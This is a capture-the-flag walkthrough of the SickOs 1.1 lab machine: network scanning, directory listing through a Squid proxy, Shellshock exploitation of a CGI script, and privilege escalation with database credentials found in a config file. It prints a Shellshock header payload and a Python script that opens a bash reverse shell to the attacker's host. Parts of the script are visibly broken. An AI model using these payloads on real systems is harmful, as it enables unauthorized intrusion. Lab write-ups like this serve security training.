Sickos 1

• Name: SickOs: 1.1
• Date release: 11 Dec 2015
• Author: D4rk
• Series: SickOs

Description

This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them

About Release

Name…: SickOs1.1 Date Release: 11 Dec 2015 Author…: D4rk Series…: SickOs Objective…: Get /root/a0216ea4d51874464078c618298b1367.txt Tester(s)…: h1tch1 Twitter…: https://twitter.com/D4rk36

Recognition

First we try to recognize the IP of our target with arp-scan.

sudo arp-scan -I eth0 --localnet --ignoredups

Our target is 192.168.128.132 we proceed to do an nmap scan to see what ports it has open and we discover port 22 and 3128.

nmap -p- --open -sT -vvv --min-rate 5000 -n -Pn 192.168.128.132 -oG allPorts

Not shown: 65532 filtered tcp ports (no-response), 1 closed tcp port (conn-refused) Some closed ports may be reported as filtered due to —defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 3128/tcp open squid-http syn-ack

Data we extract from the reconnaissance:

• Squid-http syn-ack
• Filtered ports

Lets do some research Server Squid:

Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages. Squid has extensive access controls and makes a great server accelerator. It runs on most available operating systems, including Windows and is licensed under the GNU GPL. Definicion web

So we know that what the port is doing is serving as a proxy, so we can think that a server is running on port 80 and is using Squid as a proxy:

We try to curl the ip by brokering a proxy through port 3128 which is the open port through the Squid proxy server.

Ahora podemos intentar listar directorios usando el proxy.

Now we can try to list directories using the proxy.

When we discover a cgi-bin directory we are alerted because we know that if it exists we are probably in the presence of a Shell Shock ShellShock - CGI

Let’s see if we get anything else from this dir:

We searched the web for more information about Shell Shock and found an old article Shell Shock

For example, if example.com was vulnerable then

curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/

We try changing the instruction, using only the header of the example:

Effectively we have command execution, so let’s try to get a Reverse shell through a python script:

#!/user/bin/python3
    
 import sys, signal, requests
 import threading
from pwn import *

def def_handler(sig, frame):
	print("\n[!] - exiting... \n")
	sys.exit(1)
	signal.signal(signal.SIGINT, def_handler)
	main_url = "http://192.168.128.132/cgi-bin/status"
	squid_proxy = {"http": "http://192.168.128.132:3128"}

def shellshock_attack():
	headers = {'User-Agent': "() { :; };
	echo; /bin/bash -c '/bin/bash -i dev/tcp/192.168.128.131/443 0>&1'"}
	r = requests.get(main_url, headers=headers, proxies=squid_proxy) 

if __name__ == '__main__':
	try:
		threading.Thread(target=shellshock_attack, args()).start()
	except Exception as e:
		log.error(str(e))

We execute while listening on the port we chose in the script:

We made it, we are inside the victim machine and we can execute commands, now we have to escalate our privilege.

We explore and find an interesting info inside the config.php in /var/www/wolfcms (that was in the robots.txt but I decided not to explore that way)

Inside this file are the credentials to authenticate to the database, we have the User and Password that we can use to try to escalate privileges on the machine.

• User: ‘root’
• Password: ‘john@123’

The shell is old so if you google the following output you are advised to update the shell.

We update and try to authenticate with the credentials found:

python -c 'import pty;pty.spawn(“/bin/bash”)'

It worked, we tried again and…

We are now root.

Flag found!